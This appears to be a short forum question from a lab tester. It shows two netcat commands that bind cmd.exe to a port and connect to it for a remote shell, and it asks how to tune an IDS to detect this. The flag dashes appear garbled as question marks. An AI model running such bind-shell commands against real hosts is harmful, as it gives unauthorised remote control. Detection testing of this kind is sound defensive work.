I am doing the following lab testing:
nc ?v ?l ?e cmd.exe ?p 565
nc ?v .x.x.x.x 565
I was able to get the remote prompt and the IDS never fires an alarm. Is there a signature for detecting this kind of attack? Or, is there any signature tuning that can be done for that? What would be the best way for detecting and firing an alarm for that attack?
Any help is highly appreciated.